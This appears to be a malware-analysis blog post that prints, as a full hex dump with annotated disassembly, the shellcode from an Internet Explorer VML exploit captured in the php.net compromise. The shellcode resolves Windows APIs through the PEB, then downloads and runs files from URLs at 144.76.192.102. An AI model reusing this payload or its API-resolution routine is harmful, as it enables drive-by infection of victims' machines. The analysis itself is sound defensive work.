Friday, October 25, 2013

Decoded shellcode from the IE vml exploit seen in the php.net pcap


00000000  e8 00 00 00 00 5b 8d b3 bf 01 00 00 56 8d b3 ab  .....[......V...
00000010  01 00 00 56 6a 04 68 88 4e 0d 00 e8 af 00 00 00  ...Vj.h.N.......
00000020  8d 83 d3 01 00 00 50 ff 93 bf 01 00 00 8d b3 cf  ......P.........
00000030  01 00 00 56 8d b3 bb 01 00 00 56 6a 01 68 88 90  ...V......Vj.h..
00000040  03 00 e8 88 00 00 00 8d b3 de 01 00 00 89 f7 ac  ................
00000050  3c 7c 74 06 84 c0 74 02 eb f5 c6 46 ff 00 80 3f  <|t...t....F...?
00000060  00 74 08 57 e8 04 00 00 00 eb e2 c9 c3 55 89 e5  .t.W.........U..
00000070  81 ec 08 02 00 00 60 8d b5 f8 fd ff ff 56 68 60  ......`......Vh`
00000080  02 00 00 ff 93 c3 01 00 00 8d bd fc fe ff ff 57  ...............W
00000090  68 00 00 00 00 68 00 00 00 00 56 ff 93 c7 01 00  h....h....V.....
000000a0  00 68 00 00 00 00 68 00 00 00 00 57 ff 75 08 68  .h....h....W.u.h
000000b0  00 00 00 00 ff 93 cf 01 00 00 85 c0 75 0c 68 05  ............u.h.
000000c0  00 00 00 57 ff 93 cb 01 00 00 61 c9 c2 04 00 55  ...W......a....U
000000d0  89 e5 51 56 57 8b 4d 0c 8b 75 10 8b 7d 14 ff 36  ..QVW.M..u..}..6
000000e0  ff 75 08 e8 13 00 00 00 89 07 83 c7 04 83 c6 04  .u..............
000000f0  e2 ec 5f 5e 59 89 ec 5d c2 10 00 55 89 e5 53 56  .._^Y..]...U..SV
00000100  57 51 64 ff 35 30 00 00 00 58 8b 40 0c 8b 48 0c  WQd.50...X.@..H.
00000110  8b 11 8b 41 30 6a 02 8b 7d 08 57 50 e8 5b 00 00  ...A0j..}.WP.[..
00000120  00 85 c0 74 04 89 d1 eb e7 8b 41 18 50 8b 58 3c  ...t......A.P.X<
00000130  01 d8 8b 58 78 58 50 01 c3 8b 4b 1c 8b 53 20 8b  ...XxXP...K..S .
00000140  5b 24 01 c1 01 c2 01 c3 8b 32 58 50 01 c6 6a 01  [$.......2XP..j.
00000150  ff 75 0c 56 e8 23 00 00 00 85 c0 74 08 83 c2 04  .u.V.#.....t....
00000160  83 c3 02 eb e3 58 31 d2 66 8b 13 c1 e2 02 01 d1  .....X1.f.......
00000170  03 01 59 5f 5e 5b 89 ec 5d c2 08 00 55 89 e5 51  ..Y_^[..]...U..Q
00000180  53 52 31 c9 31 db 31 d2 8b 45 08 8a 10 80 ca 60  SR1.1.1..E.....`
00000190  01 d3 d1 e3 03 45 10 8a 08 84 c9 e0 ee 31 c0 8b  .....E.......1..
000001a0  4d 0c 39 cb 74 01 40 5a 5b 59 89 ec 5d c2 0c 00  M.9.t.@Z[Y..]...
000001b0  86 57 0d 00 92 21 0d 00 ce 15 d2 00 ea 6f 00 00  .W...!.......o..
000001c0  c6 30 8e 03 00 00 00 00 00 00 00 00 00 00 00 00  .0..............
000001d0  00 00 00 00 00 00 00 00 75 72 6c 6d 6f 6e 2e 64  ........urlmon.d
000001e0  6c 6c 00 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  ll.http://144.76
000001f0  2e 31 39 32 2e 31 30 32 2f 3f 39 64 65 32 36 66  .192.102/?9de26f
00000200  66 33 62 36 36 62 61 38 32 62 33 35 65 33 31 62  f3b66ba82b35e31b
00000210  66 34 65 61 39 37 35 64 66 65 7c 68 74 74 70 3a  f4ea975dfe|http:
00000220  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000230  2f 3f 39 30 66 35 62 39 61 31 66 62 63 62 32 65  /?90f5b9a1fbcb2e
00000240  34 61 38 37 39 30 30 31 61 32 38 64 37 39 34 30  4a879001a28d7940
00000250  62 34 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  b4|http://144.76
00000260  2e 31 39 32 2e 31 30 32 2f 3f 38 65 65 63 36 63  .192.102/?8eec6c
00000270  35 39 36 62 62 33 65 36 38 34 30 39 32 62 39 65  596bb3e684092b9e
00000280  61 38 39 37 30 64 37 65 61 65 7c 68 74 74 70 3a  a8970d7eae|http:
00000290  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
000002a0  2f 3f 33 35 35 32 33 62 62 38 31 65 63 61 36 30  /?35523bb81eca60
000002b0  34 66 39 65 62 64 31 37 34 38 38 37 39 66 33 66  4f9ebd1748879f3f
000002c0  63 31 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  c1|http://144.76
000002d0  2e 31 39 32 2e 31 30 32 2f 3f 62 32 38 62 30 36  .192.102/?b28b06
000002e0  66 30 31 65 32 31 39 64 35 38 65 66 62 61 39 66  f01e219d58efba9f
000002f0  65 30 64 31 66 65 31 62 62 33 7c 68 74 74 70 3a  e0d1fe1bb3|http:
00000300  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000310  2f 3f 35 32 64 34 65 36 34 34 65 39 63 64 61 35  /?52d4e644e9cda5
00000320  31 38 38 32 34 32 39 33 65 37 61 34 63 64 62 37  18824293e7a4cdb7
00000330  61 31 00                                         a1.

Disassembly of the code portion (offsets 0x0–0x179; the compare routine called at 0x17c and the data from 0x1b0 onward appear only in the hex dump above):

; --- entry (offset 0x0): resolve the imports, load urlmon, then walk the '|'-separated URL list ---
; ebx = load address + 5 after the call/pop pair, so [ebx+N] is shellcode offset N+5 throughout.
; Data offsets (from the hex dump above): 0x1b0 five dword hashes (0xd5786, 0xd2192, 0xd215ce,
; 0x6fea, 0x38e30c6); 0x1c4 five zeroed dword slots that receive the resolved addresses;
; 0x1d8 "urlmon.dll"; 0x1e3 the URL list. There is no push ebp/mov ebp,esp here, so the
; leave at 0x6b tears down whatever frame the exploit's caller left in ebp.
00000000  E800000000        call dword 0x5              ; GetPC: pushes the address of offset 0x5
00000005  5B                pop ebx                     ; ebx = base+5, the global data pointer (preserved by every callee below)
00000006  8DB3BF010000      lea esi,[ebx+0x1bf]         ; esi = offset 0x1c4: output table for resolved addresses
0000000C  56                push esi                    ; arg4: out[]
0000000D  8DB3AB010000      lea esi,[ebx+0x1ab]         ; esi = offset 0x1b0: hash table
00000013  56                push esi                    ; arg3: hashes[]
00000014  6A04              push byte +0x4              ; arg2: count = 4
00000016  68884E0D00        push dword 0xd4e88          ; arg1: module-name hash (the module is not named on this page)
0000001B  E8AF000000        call dword 0xcf             ; resolve 4 exports into 0x1c4..0x1d3 (callee cleans 0x10)
00000020  8D83D3010000      lea eax,[ebx+0x1d3]         ; eax = offset 0x1d8: "urlmon.dll"
00000026  50                push eax
00000027  FF93BF010000      call dword [ebx+0x1bf]      ; out[0]("urlmon.dll"): one string arg, consistent with a LoadLibraryA-style import
0000002D  8DB3CF010000      lea esi,[ebx+0x1cf]         ; esi = offset 0x1d4: fifth output slot
00000033  56                push esi
00000034  8DB3BB010000      lea esi,[ebx+0x1bb]         ; esi = offset 0x1c0: fifth hash (0x38e30c6)
0000003A  56                push esi
0000003B  6A01              push byte +0x1              ; count = 1
0000003D  6888900300        push dword 0x39088          ; module-name hash; presumably the library just loaded
00000042  E888000000        call dword 0xcf             ; resolve 1 export into 0x1d4
00000047  8DB3DE010000      lea esi,[ebx+0x1de]         ; esi = offset 0x1e3: start of the URL list
0000004D  89F7              mov edi,esi                 ; edi = start of the current token
0000004F  AC                lodsb                       ; al = *esi++
00000050  3C7C              cmp al,0x7c                 ; '|' delimiter?
00000052  7406              jz 0x5a
00000054  84C0              test al,al                  ; NUL terminator?
00000056  7402              jz 0x5a
00000058  EBF5              jmp short 0x4f
0000005A  C646FF00          mov byte [esi-0x1],0x0      ; terminate the token in place (overwrites the '|')
0000005E  803F00            cmp byte [edi],0x0          ; empty token => done. After the last token edi points one past its NUL,
00000061  7408              jz 0x6b                     ;   so termination depends on the byte after 0x332 also being 0 (not shown in the dump)
00000063  57                push edi                    ; arg: current URL
00000064  E804000000        call dword 0x6d             ; download-and-run attempt for this URL; its result is ignored
00000069  EBE2              jmp short 0x4d              ; next token (esi already points past the delimiter)
0000006B  C9                leave
0000006C  C3                ret
; --- sub 0x6d: download one URL to a temp file and run it; arg [ebp+8] = NUL-terminated URL; ret 0x4 ---
; Frame: 0x208 bytes of locals = two 0x104 (MAX_PATH) buffers, temp directory at ebp-0x208 and
; temp file name at ebp-0x104. pushad/popad save every register around the API calls (ebx, the
; global data pointer, included). The four indirect calls use the slots filled at entry:
; out[1], out[2], out[4] (the urlmon export), out[3]. API names below are inferred from the
; argument shapes only; the hashes are not resolved on this page.
0000006D  55                push ebp
0000006E  89E5              mov ebp,esp
00000070  81EC08020000      sub esp,0x208               ; locals: 2 * 0x104
00000076  60                pushad
00000077  8DB5F8FDFFFF      lea esi,[ebp-0x208]         ; esi = temp-directory buffer
0000007D  56                push esi                    ; arg2: buffer
0000007E  6860020000        push dword 0x260            ; arg1: length 0x260 — more than the 0x208 reserved at 0x70
00000083  FF93C3010000      call dword [ebx+0x1c3]      ; out[1](0x260, buf): consistent with GetTempPathA(nBufferLength, lpBuffer)
00000089  8DBDFCFEFFFF      lea edi,[ebp-0x104]         ; edi = temp-file-name buffer (upper half of the frame)
0000008F  57                push edi                    ; arg4: output name
00000090  6800000000        push dword 0x0              ; arg3: 0
00000095  6800000000        push dword 0x0              ; arg2: NULL
0000009A  56                push esi                    ; arg1: temp directory
0000009B  FF93C7010000      call dword [ebx+0x1c7]      ; out[2](dir, NULL, 0, name): consistent with GetTempFileNameA
000000A1  6800000000        push dword 0x0              ; arg5: NULL
000000A6  6800000000        push dword 0x0              ; arg4: 0
000000AB  57                push edi                    ; arg3: temp file name
000000AC  FF7508            push dword [ebp+0x8]        ; arg2: URL
000000AF  6800000000        push dword 0x0              ; arg1: NULL
000000B4  FF93CF010000      call dword [ebx+0x1cf]      ; out[4](NULL, url, file, 0, NULL): consistent with URLDownloadToFileA
000000BA  85C0              test eax,eax
000000BC  750C              jnz 0xca                    ; non-zero return => skip execution; only a 0 (S_OK-style) result proceeds
000000BE  6805000000        push dword 0x5              ; arg2: 5
000000C3  57                push edi                    ; arg1: path of the downloaded file
000000C4  FF93CB010000      call dword [ebx+0x1cb]      ; out[3](file, 5): consistent with WinExec(lpCmdLine, SW_SHOW)
000000CA  61                popad                       ; restores eax too, so the caller never sees the outcome
000000CB  C9                leave
000000CC  C20400            ret 0x4
; --- sub 0xcf: resolve `count` exports of one module; ret 0x10 ---
; Args: [ebp+8] module-name hash, [ebp+0xc] count, [ebp+0x10] hashes[], [ebp+0x14] out[].
; For each i: out[i] = sub_0xfb(modhash, hashes[i]). `loop` with ecx == 0 would wrap to 2^32
; iterations; the two call sites (0x14 and 0x42) pass 4 and 1.
000000CF  55                push ebp
000000D0  89E5              mov ebp,esp
000000D2  51                push ecx
000000D3  56                push esi
000000D4  57                push edi
000000D5  8B4D0C            mov ecx,[ebp+0xc]           ; ecx = count (loop counter)
000000D8  8B7510            mov esi,[ebp+0x10]          ; esi = &hashes[0]
000000DB  8B7D14            mov edi,[ebp+0x14]          ; edi = &out[0]
000000DE  FF36              push dword [esi]            ; arg2: export-name hash
000000E0  FF7508            push dword [ebp+0x8]        ; arg1: module-name hash
000000E3  E813000000        call dword 0xfb             ; eax = resolved address (callee cleans 8)
000000E8  8907              mov [edi],eax               ; out[i] = eax
000000EA  83C704            add edi,byte +0x4
000000ED  83C604            add esi,byte +0x4
000000F0  E2EC              loop 0xde
000000F2  5F                pop edi
000000F3  5E                pop esi
000000F4  59                pop ecx
000000F5  89EC              mov esp,ebp
000000F7  5D                pop ebp
000000F8  C21000            ret 0x10
; --- sub 0xfb: find an export by (module hash, name hash) via the PEB loader list; ret 0x8 ---
; Args: [ebp+8] module-name hash, [ebp+0xc] export-name hash. Returns eax = absolute address.
; The compare routine at 0x17c is outside the disassembled portion (its bytes are in the dump at
; 0x17c..0x1af). It is called with (name, hash, step) and, judging by the jz after each call,
; returns 0 on a match; step appears to be 2 for the UTF-16 module name and 1 for the ASCII
; export name. Offsets below follow the 32-bit Windows layouts: PEB+0xc Ldr, Ldr+0xc
; InLoadOrderModuleList, entry+0x18 DllBase, entry+0x30 BaseDllName.Buffer; DOS header +0x3c
; e_lfanew; NT headers +0x78 export-directory RVA; export dir +0x1c/+0x20/+0x24 =
; AddressOfFunctions / AddressOfNames / AddressOfNameOrdinals.
000000FB  55                push ebp
000000FC  89E5              mov ebp,esp
000000FE  53                push ebx                    ; ebx is the caller's global data pointer; saved and restored
000000FF  56                push esi
00000100  57                push edi
00000101  51                push ecx
00000102  64FF3530000000    push dword [dword fs:0x30]  ; fs:[0x30] = PEB
00000109  58                pop eax
0000010A  8B400C            mov eax,[eax+0xc]           ; eax = PEB->Ldr
0000010D  8B480C            mov ecx,[eax+0xc]           ; ecx = first InLoadOrder entry
00000110  8B11              mov edx,[ecx]               ; edx = entry->Flink (next entry)
00000112  8B4130            mov eax,[ecx+0x30]          ; eax = BaseDllName.Buffer (UTF-16)
00000115  6A02              push byte +0x2              ; step = 2 (wide chars)
00000117  8B7D08            mov edi,[ebp+0x8]
0000011A  57                push edi                    ; module-name hash
0000011B  50                push eax                    ; name
0000011C  E85B000000        call dword 0x17c
00000121  85C0              test eax,eax
00000123  7404              jz 0x129                    ; 0 => module matched
00000125  89D1              mov ecx,edx                 ; else advance to the next module
00000127  EBE7              jmp short 0x110             ; no list-head check: the loader list is circular, so an unmatched hash loops forever
00000129  8B4118            mov eax,[ecx+0x18]          ; eax = DllBase
0000012C  50                push eax                    ; keep the base on the stack
0000012D  8B583C            mov ebx,[eax+0x3c]          ; e_lfanew
00000130  01D8              add eax,ebx                 ; eax = NT headers
00000132  8B5878            mov ebx,[eax+0x78]          ; export-directory RVA
00000135  58                pop eax                     ; eax = base
00000136  50                push eax
00000137  01C3              add ebx,eax                 ; ebx = export directory VA
00000139  8B4B1C            mov ecx,[ebx+0x1c]          ; AddressOfFunctions RVA
0000013C  8B5320            mov edx,[ebx+0x20]          ; AddressOfNames RVA
0000013F  8B5B24            mov ebx,[ebx+0x24]          ; AddressOfNameOrdinals RVA
00000142  01C1              add ecx,eax                 ; ... each rebased to a VA
00000144  01C2              add edx,eax
00000146  01C3              add ebx,eax
00000148  8B32              mov esi,[edx]               ; esi = RVA of the current export name
0000014A  58                pop eax                     ; eax = base (re-pushed below)
0000014B  50                push eax
0000014C  01C6              add esi,eax                 ; esi = name VA
0000014E  6A01              push byte +0x1              ; step = 1 (ASCII)
00000150  FF750C            push dword [ebp+0xc]        ; export-name hash
00000153  56                push esi                    ; name
00000154  E823000000        call dword 0x17c
00000159  85C0              test eax,eax
0000015B  7408              jz 0x165                    ; 0 => name matched
0000015D  83C204            add edx,byte +0x4           ; next name RVA (dword)
00000160  83C302            add ebx,byte +0x2           ; next ordinal (word), kept in step with edx
00000163  EBE3              jmp short 0x148             ; no NumberOfNames bound: an unmatched hash walks past the table
00000165  58                pop eax                     ; eax = base
00000166  31D2              xor edx,edx
00000168  668B13            mov dx,[ebx]                ; dx = ordinal of the matched name
0000016B  C1E202            shl edx,0x2                 ; * sizeof(DWORD)
0000016E  01D1              add ecx,edx                 ; &AddressOfFunctions[ordinal]
00000170  0301              add eax,[ecx]               ; eax = base + function RVA (forwarded exports are not handled)
00000172  59                pop ecx
00000173  5F                pop edi
00000174  5E                pop esi
00000175  5B                pop ebx
00000176  89EC              mov esp,ebp
00000178  5D                pop ebp
00000179  C20800            ret 0x8